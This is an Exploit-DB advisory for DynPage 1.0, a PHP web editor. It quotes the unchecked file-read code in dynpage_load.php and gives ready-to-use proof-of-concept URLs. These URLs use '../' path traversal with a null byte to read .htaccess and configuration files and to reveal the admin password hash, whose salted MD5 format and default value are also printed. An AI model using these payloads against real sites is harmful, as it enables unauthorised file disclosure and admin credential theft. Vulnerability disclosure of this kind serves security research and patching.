dynpage 1.0 - Multiple Vulnerabilities

EDB-ID:

14927

CVE:


EDB Verified:

Author:

Abysssec

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-09-07

Vulnerable App: 
'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

 http://www.exploit-db.com/moaub-7-dynpage-multiple-remote-vulnerabilities/
'''

- Title  : DynPage Multiple Remote Vulnerabilities.
- Affected Version : <= v1.0
- Vendor  Site   : http://www.dynpage.net
 
- Discovery : Abysssec.com
 
 
- Description :
===============
DynPage allows you to edit Websites online and make pieces of contents editable with a comfortable editor.
DynPage implements the CKeditor - one of the best Internet editors. 
The integration of content into the HTML pages can be done with Ajax/Javascript or PHP - so you can also handle cross domain sites. 
DynPage is written in PHP and does not require MySQL database. It's easy to install and to configurate.

- Vulnerabilities:
==================
1)Local File Disclosure:
---------------------
	+Code:
	/content/dynpage_load.php #[line(20-28)]:

	$filename = $_GET["file"];
	if (!is_dir ($filename) && file_exists ($filename)) {
	
		$bytes = filesize ($filename);
		$fh = fopen($filename, 'r');
		print (fread ($fh, $bytes));
		fclose ($fh);

	}


	+POC: 
	     http://www.Site.com/dynpage/content/dynpage_load.php?file=../.htaccess%00


2)Admin hash Disclosure:
---------------------------------
	The Admin password hash format:	MD5('admin:'+$password)
	then password's salt is "admin:".

	2-a)Default password is admin,that stored in config_global.inc.php(line 41-42 )
			// Default login admin
			"default_login_hash" => "d2abaa37a7c3db1137d385e1d8c15fd2",
	+POC:for see this hash:
	  http://www.Site.com/dynpage/content/dynpage_load.php?file=../config_global.inc.php%00

	2-b)the hash  password  stored as SESSION in /conf/init.inc.php.
		<?php
			// This file is generated automatically!
			// No not modify manually!
			$_SESSION['DYNPAGE_CONF_VAR_ALL']['login_hash']="2d08086927f4d87a31154aaf0ba2e067";
			$_SESSION['DYNPAGE_CONF_VAR_ALL']['admin_email']="a@a.com";
		?>
	+POC:for see this hash:
	  http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services